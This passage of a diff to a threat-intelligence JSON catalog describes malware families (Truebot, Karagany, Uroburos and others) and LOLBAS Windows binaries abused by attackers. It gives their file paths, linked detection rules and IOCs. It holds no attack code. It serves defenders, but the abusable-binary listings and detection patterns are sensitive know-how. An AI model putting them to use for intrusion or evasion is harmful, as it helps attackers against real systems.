+ "description": "[[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)]", + "meta": { + "id": "b63763ce-e59e-49ef-891c-0eef6d0cbb46" + }, + "related": [ + { + "dest-uuid": "b88c4891-40da-4832-ba42-6c6acd455bd1", + "type": "similar" + } + ], + "uuid": "0ef3a4a1-cad0-45da-9eea-70f85cd888af", + "value": "Karagany" + }, + { + "description": "[Trojan.Karagany](https://app.tidalcyber.com/software/b88c4891-40da-4832-ba42-6c6acd455bd1) is a modular remote access tool used for recon and linked to [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1). The source code for [Trojan.Karagany](https://app.tidalcyber.com/software/b88c4891-40da-4832-ba42-6c6acd455bd1) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. [[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)][[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)][[Dragos DYMALLOY ](https://app.tidalcyber.com/references/d2785c6e-e0d1-4e90-a2d5-2c302176d5d3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0094", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "used-by" + }, + { + "dest-uuid": "82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "type": "similar" + }, + { + "dest-uuid": "e8b885ae-4bf3-42c0-8b9e-a410c08eb441", + "type": "similar" + }, + { + "dest-uuid": "0ef3a4a1-cad0-45da-9eea-70f85cd888af", + "type": "similar" + } + ], + "uuid": "b88c4891-40da-4832-ba42-6c6acd455bd1", + "value": "Trojan.Karagany" + }, + { + "description": "[Trojan.Mebromi](https://app.tidalcyber.com/software/f8a4213d-633b-4e3d-8e59-a769e852b93b) is BIOS-level malware that takes control of the victim before MBR. [[Ge 2011](https://app.tidalcyber.com/references/dd6032fb-8913-4593-81b9-86d1239e01f4)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0001", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c5e9cb46-aced-466c-85ea-7db5572ad9ec", + "type": "similar" + } + ], + "uuid": "f8a4213d-633b-4e3d-8e59-a769e852b93b", + "value": "Trojan.Mebromi" + }, + { + "description": "[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]", + "meta": { + "id": "550ffac8-104c-4089-8800-dcae577e5cad", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "669f8b7a-2404-47ab-843d-e63431faafec", + "type": "similar" + } + ], + "uuid": "7393cb6b-37a3-4f15-8a03-416b14711c2a", + "value": "TRUECORE" + }, + { + "description": "[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]", + "meta": { + "id": "cb17c165-c322-4d9b-a9ca-4e154db499ff", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "669f8b7a-2404-47ab-843d-e63431faafec", + "type": "similar" + } + ], + "uuid": "ba587d52-2ee7-4539-9499-aa9338b8c7f9", + "value": "Silence" + }, + { + "description": "Truebot is a botnet often used as a loader for other malware. In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new Truebot variants infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 (a vulnerability in the IT auditing application Netwrix Auditor) to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections; FlawedGrace and Cobalt Strike for various post-exploitation activities; and Teleport, a custom tool for data exfiltration.[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.silence\n\n**Malware Bazaar (Samples & IOCs)**: https://bazaar.abuse.ch/browse/tag/truebot/\n\n**PulseDive (IOCs)**: https://pulsedive.com/threat/Truebot", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5000", + "source": "Tidal Cyber", + "tags": [ + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "a98d7a43-f227-478e-81de-e7299639a355", + "992bdd33-4a47-495d-883a-58010a2f0efb", + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b534349f-55a4-41b8-9623-6707765c3c50", + "type": "used-by" + }, + { + "dest-uuid": "393da13e-016c-41a3-9d89-b33173adecbf", + "type": "used-by" + }, + { + "dest-uuid": "7393cb6b-37a3-4f15-8a03-416b14711c2a", + "type": "similar" + }, + { + "dest-uuid": "ba587d52-2ee7-4539-9499-aa9338b8c7f9", + "type": "similar" + } + ], + "uuid": "669f8b7a-2404-47ab-843d-e63431faafec", + "value": "Truebot" + }, + { + "description": "[Truvasys](https://app.tidalcyber.com/software/50844dba-8999-42ba-ba29-511e3faf4bc3) is first-stage malware that has been used by [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0). It is a collection of modules written in the Delphi programming language. [[Microsoft Win Defender Truvasys Sep 2017](https://app.tidalcyber.com/references/3c8ba6ef-8edc-44bf-9abe-655ba0f45912)] [[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)] [[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0178", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "cc798766-8662-4b55-8536-6d057fbc58f0", + "type": "used-by" + }, + { + "dest-uuid": "691c60e2-273d-4d56-9ce6-b67e0f8719ad", + "type": "similar" + } + ], + "uuid": "50844dba-8999-42ba-ba29-511e3faf4bc3", + "value": "Truvasys" + }, + { + "description": "[TSCookie](https://app.tidalcyber.com/software/9872ab5a-c76e-4404-91f9-5b745722443b) is a remote access tool (RAT) that has been used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) in campaigns against Japanese targets.[[JPCert TSCookie March 2018](https://app.tidalcyber.com/references/ff1717f7-0d2e-4947-87d7-44576affe9f8)][[JPCert BlackTech Malware September 2019](https://app.tidalcyber.com/references/26f44bde-f723-4854-8acc-3d95e5fa764a)]. [TSCookie](https://app.tidalcyber.com/software/9872ab5a-c76e-4404-91f9-5b745722443b) has been referred to as [PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) though more recent reporting indicates a separation between the two.[[JPCert PLEAD Downloader June 2018](https://app.tidalcyber.com/references/871f4af2-ed99-4256-a74d-b8c0816a82ab)][[JPCert BlackTech Malware September 2019](https://app.tidalcyber.com/references/26f44bde-f723-4854-8acc-3d95e5fa764a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0436", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "type": "used-by" + }, + { + "dest-uuid": "76ac7989-c5cc-42e2-93e3-d6c476f01ace", + "type": "similar" + } + ], + "uuid": "9872ab5a-c76e-4404-91f9-5b745722443b", + "value": "TSCookie" + }, + { + "description": "TShark is a network protocol analyzer utility.", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S5268", + "source": "Tidal Cyber", + "tags": [ + "e1be4b53-7524-4e88-bf6d-358cfdf96772", + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "tool" + }, + "related": [], + "uuid": "57f9458f-4dad-411e-9971-8e3e166f173b", + "value": "TShark" + }, + { + "description": "[[Ttdinject.exe - LOLBAS Project](/references/3146c9c9-9836-4ce5-afe6-ef8f7b4a7b9d)]", + "meta": { + "id": "cd67cca2-9310-4b73-943d-06a57297ad34", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "7bd9859e-4260-4c86-903b-1f8bcf658da1", + "type": "similar" + } + ], + "uuid": "05cf2d78-08e4-4a20-ae82-64ff4a3c9c33", + "value": "Ttdinject.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)\n\n**Author:** Maxime Nadeau\n\n**Paths:**\n* C:\\Windows\\System32\\ttdinject.exe\n* C:\\Windows\\Syswow64\\ttdinject.exe\n\n**Resources:**\n* [https://twitter.com/Oddvarmoe/status/1196333160470138880](https://twitter.com/Oddvarmoe/status/1196333160470138880)\n\n**Detection:**\n* Sigma: [create_remote_thread_win_ttdinjec.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml)\n* Sigma: [proc_creation_win_lolbin_ttdinject.yml](https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml)\n* IOC: Parent child relationship. Ttdinject.exe parent for executed command\n* IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\payload.exe\") from the ttdinject.exe process[[Ttdinject.exe - LOLBAS Project](/references/3146c9c9-9836-4ce5-afe6-ef8f7b4a7b9d)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5168", + "source": "Tidal Cyber", + "tags": [ + "fc67aea7-f207-4cf5-8413-e33c76538cf6", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "05cf2d78-08e4-4a20-ae82-64ff4a3c9c33", + "type": "similar" + } + ], + "uuid": "7bd9859e-4260-4c86-903b-1f8bcf658da1", + "value": "Ttdinject" + }, + { + "description": "[[Tttracer.exe - LOLBAS Project](/references/7c88a77e-034e-4847-8bd7-1be3a684a158)]", + "meta": { + "id": "3a6e4af2-0bde-43e5-9eb4-c1e867091be6", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "ab06ccb0-21c7-4d84-99ff-3349ce476910", + "type": "similar" + } + ], + "uuid": "148072af-ae62-419f-9c3a-3b9dc4c25a24", + "value": "Tttracer.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows 1809 and newer to Debug Time Travel\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\tttracer.exe\n* C:\\Windows\\SysWOW64\\tttracer.exe\n\n**Resources:**\n* [https://twitter.com/oulusoyum/status/1191329746069655553](https://twitter.com/oulusoyum/status/1191329746069655553)\n* [https://twitter.com/mattifestation/status/1196390321783025666](https://twitter.com/mattifestation/status/1196390321783025666)\n* [https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html](https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_tttracer_mod_load.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml)\n* Sigma: [image_load_tttracer_mod_load.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml)\n* Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)\n* IOC: Parent child relationship. Tttracer parent for executed command[[Tttracer.exe - LOLBAS Project](/references/7c88a77e-034e-4847-8bd7-1be3a684a158)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5169", + "source": "Tidal Cyber", + "tags": [ + "3c4e3160-4e82-49ce-b6a3-17879dd4b83c", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "148072af-ae62-419f-9c3a-3b9dc4c25a24", + "type": "similar" + } + ], + "uuid": "ab06ccb0-21c7-4d84-99ff-3349ce476910", + "value": "Tttracer" + }, + { + "description": "[Turian](https://app.tidalcyber.com/software/571a45a7-68c9-452c-99bf-1d5b5fdd08b3) is a backdoor that has been used by [BackdoorDiplomacy](https://app.tidalcyber.com/groups/e5b0da2b-12bc-4113-9459-9c51329c9ae0) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://app.tidalcyber.com/software/571a45a7-68c9-452c-99bf-1d5b5fdd08b3) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.[[ESET BackdoorDiplomacy Jun 2021](https://app.tidalcyber.com/references/127d4b10-8d61-4bdf-b5b9-7d86bbc065b6)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0647", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "e5b0da2b-12bc-4113-9459-9c51329c9ae0", + "type": "used-by" + }, + { + "dest-uuid": "350f12cf-fd3b-4dad-b323-14b943090df4", + "type": "similar" + } + ], + "uuid": "571a45a7-68c9-452c-99bf-1d5b5fdd08b3", + "value": "Turian" + }, + { + "description": "[TURNEDUP](https://app.tidalcyber.com/software/c7f10715-cf13-4360-8511-aa3f93dd7688) is a non-public backdoor. It has been dropped by [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac)'s [StoneDrill](https://app.tidalcyber.com/software/9eee52a2-5ac1-4561-826c-23ec7fbc7876) malware. [[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)] [[FireEye APT33 Webinar Sept 2017](https://app.tidalcyber.com/references/9b378592-5737-403d-8a07-27077f5b2d61)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0199", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c", + "type": "similar" + } + ], + "uuid": "c7f10715-cf13-4360-8511-aa3f93dd7688", + "value": "TURNEDUP" + }, + { + "description": "[TYPEFRAME](https://app.tidalcyber.com/software/6c93d3c4-cae5-48a9-948d-bc5264230316) is a remote access tool that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). [[US-CERT TYPEFRAME June 2018](https://app.tidalcyber.com/references/b89f20ad-39c4-480f-b02e-20f4e71f6b95)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0263", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "7ba0fc46-197d-466d-8b9f-f1c64d5d81e5", + "type": "similar" + } + ], + "uuid": "6c93d3c4-cae5-48a9-948d-bc5264230316", + "value": "TYPEFRAME" + }, + { + "description": "[UACMe](https://app.tidalcyber.com/software/5788edee-d1b7-4406-9122-bee596362236) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. [[Github UACMe](https://app.tidalcyber.com/references/7006d59d-3b61-4030-a680-5dac52133722)]", + "meta": { + "platforms": [], + "software_attack_id": "S0116", + "source": "MITRE", + "tags": [ + "7de7d799-f836-4555-97a4-0db776eb6932", + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "102c3898-85e0-43ee-ae28-62a0a3ed9507", + "type": "similar" + } + ], + "uuid": "5788edee-d1b7-4406-9122-bee596362236", + "value": "UACMe" + }, + { + "description": "[UBoatRAT](https://app.tidalcyber.com/software/5214ae01-ccd5-4e97-8f9c-14eb16e75544) is a remote access tool that was identified in May 2017.[[PaloAlto UBoatRAT Nov 2017](https://app.tidalcyber.com/references/235a1129-2f35-4861-90b8-1f761d89b0f9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0333", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "518bb5f1-91f4-4ff2-b09d-5a94e1ebe95f", + "type": "similar" + } + ], + "uuid": "5214ae01-ccd5-4e97-8f9c-14eb16e75544", + "value": "UBoatRAT" + }, + { + "description": "A Linux rootkit that provides backdoor access and hides from defenders.", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0221", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "3d8e547d-9456-4f32-a895-dc86134e282f", + "type": "similar" + } + ], + "uuid": "227c12df-8126-4e79-b9bd-0e4633fa12fa", + "value": "Umbreon" + }, + { + "description": "[Unknown Logger](https://app.tidalcyber.com/software/846b3762-3949-4501-b781-6dca22db088f) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. [[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0130", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "used-by" + }, + { + "dest-uuid": "ab3580c8-8435-4117-aace-3d9fbe46aa56", + "type": "similar" + } + ], + "uuid": "846b3762-3949-4501-b781-6dca22db088f", + "value": "Unknown Logger" + }, + { + "description": "[[Unregmp2.exe - LOLBAS Project](/references/9ad11187-bf91-4205-98c7-c7b981e4ab6f)]", + "meta": { + "id": "0ea54431-cad2-4f16-939c-d7c5c046fcf9", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "456fb5b3-76e5-47f4-b964-09d68adb889e", + "type": "similar" + } + ], + "uuid": "824e7a25-83a0-4037-b0b5-af5fa1ed299a", + "value": "Unregmp2.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Windows Media Player Setup Utility\n\n**Author:** Wade Hickey\n\n**Paths:**\n* C:\\Windows\\System32\\unregmp2.exe\n* C:\\Windows\\SysWOW64\\unregmp2.exe\n\n**Resources:**\n* [https://twitter.com/notwhickey/status/1466588365336293385](https://twitter.com/notwhickey/status/1466588365336293385)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_unregmp2.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml)\n* IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`[[Unregmp2.exe - LOLBAS Project](/references/9ad11187-bf91-4205-98c7-c7b981e4ab6f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5170", + "source": "Tidal Cyber", + "tags": [ + "40f11d0d-09f2-4bd1-bc79-1430464a52a7", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "824e7a25-83a0-4037-b0b5-af5fa1ed299a", + "type": "similar" + } + ], + "uuid": "456fb5b3-76e5-47f4-b964-09d68adb889e", + "value": "Unregmp2" + }, + { + "description": "[[Update.exe - LOLBAS Project](/references/2c85d5e5-2cb2-4af7-8c33-8aaac3360706)]", + "meta": { + "id": "a6f0c9e1-738d-4643-84e9-54bf9b379c32", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "487d4c42-12ee-4c90-b284-cca04dadb951", + "type": "similar" + } + ], + "uuid": "c24db3d2-308c-4c4e-a6dd-58258013dc7e", + "value": "Update.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* %localappdata%\\Microsoft\\Teams\\update.exe\n\n**Resources:**\n* [https://www.youtube.com/watch?v=rOP3hnkj7ls](https://www.youtube.com/watch?v=rOP3hnkj7ls)\n* [https://twitter.com/reegun21/status/1144182772623269889](https://twitter.com/reegun21/status/1144182772623269889)\n* [https://twitter.com/MrUn1k0d3r/status/1143928885211537408](https://twitter.com/MrUn1k0d3r/status/1143928885211537408)\n* [https://twitter.com/reegun21/status/1291005287034281990](https://twitter.com/reegun21/status/1291005287034281990)\n* [http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/](http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/)\n* [https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12](https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12)\n* [https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56](https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56)\n* [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_squirrel.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml)\n* IOC: Update.exe spawned an unknown process[[Update.exe - LOLBAS Project](/references/2c85d5e5-2cb2-4af7-8c33-8aaac3360706)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5243", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "c24db3d2-308c-4c4e-a6dd-58258013dc7e", + "type": "similar" + } + ], + "uuid": "487d4c42-12ee-4c90-b284-cca04dadb951", + "value": "Update" + }, + { + "description": "[[FireEye APT10 Sept 2018](https://app.tidalcyber.com/references/5f122a27-2137-4016-a482-d04106187594)]", + "meta": { + "id": "5bdab850-14c7-42b5-a5f1-7a50221586c7" + }, + "related": [ + { + "dest-uuid": "a3c211f8-52aa-4bfd-8382-940f2194af28", + "type": "similar" + } + ], + "uuid": "d41b4a6c-7b79-494f-92e3-ea56db4cf988", + "value": "ANEL" + }, + { + "description": "[UPPERCUT](https://app.tidalcyber.com/software/a3c211f8-52aa-4bfd-8382-940f2194af28) is a backdoor that has been used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322). [[FireEye APT10 Sept 2018](https://app.tidalcyber.com/references/5f122a27-2137-4016-a482-d04106187594)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0275", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", + "type": "similar" + }, + { + "dest-uuid": "d41b4a6c-7b79-494f-92e3-ea56db4cf988", + "type": "similar" + } + ], + "uuid": "a3c211f8-52aa-4bfd-8382-940f2194af28", + "value": "UPPERCUT" + }, + { + "description": "[[Url.dll - LOLBAS Project](/references/0c88fb72-6be5-4a01-af1c-553650779253)]", + "meta": { + "id": "def4064a-304e-4e84-8456-51fe980ba1f2", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "96e24cc0-f1ce-4595-90c4-5a4976394db8", + "type": "similar" + } + ], + "uuid": "274b601e-bc26-45b5-9532-3eca488c2c4a", + "value": "Url.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Internet Shortcut Shell Extension DLL.\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\url.dll\n* c:\\windows\\syswow64\\url.dll\n\n**Resources:**\n* [https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/](https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/)\n* [https://twitter.com/DissectMalware/status/995348436353470465](https://twitter.com/DissectMalware/status/995348436353470465)\n* [https://twitter.com/bohops/status/974043815655956481](https://twitter.com/bohops/status/974043815655956481)\n* [https://twitter.com/yeyint_mth/status/997355558070927360](https://twitter.com/yeyint_mth/status/997355558070927360)\n* [https://twitter.com/Hexacorn/status/974063407321223168](https://twitter.com/Hexacorn/status/974063407321223168)\n* [https://windows10dll.nirsoft.net/url_dll.html](https://windows10dll.nirsoft.net/url_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Url.dll - LOLBAS Project](/references/0c88fb72-6be5-4a01-af1c-553650779253)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5200", + "source": "Tidal Cyber", + "tags": [ + "34505028-b7d8-4da4-8dee-9926f3dbd37a", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "274b601e-bc26-45b5-9532-3eca488c2c4a", + "type": "similar" + } + ], + "uuid": "96e24cc0-f1ce-4595-90c4-5a4976394db8", + "value": "Url" + }, + { + "description": "[[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)]", + "meta": { + "id": "68853d9e-2716-56bd-8074-b68e83dbb9db" + }, + "related": [ + { + "dest-uuid": "89ffc27c-b81f-473a-87d6-907cacdce61c", + "type": "similar" + } + ], + "uuid": "d2f34441-00b4-41a5-aa43-17428b0fea39", + "value": "Snake" + }, + { + "description": "[Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) is a sophisticated cyber espionage tool written in C that has been used by units within Russia's Federal Security Service (FSB) associated with the [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) toolset to collect intelligence on sensitive targets worldwide. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement 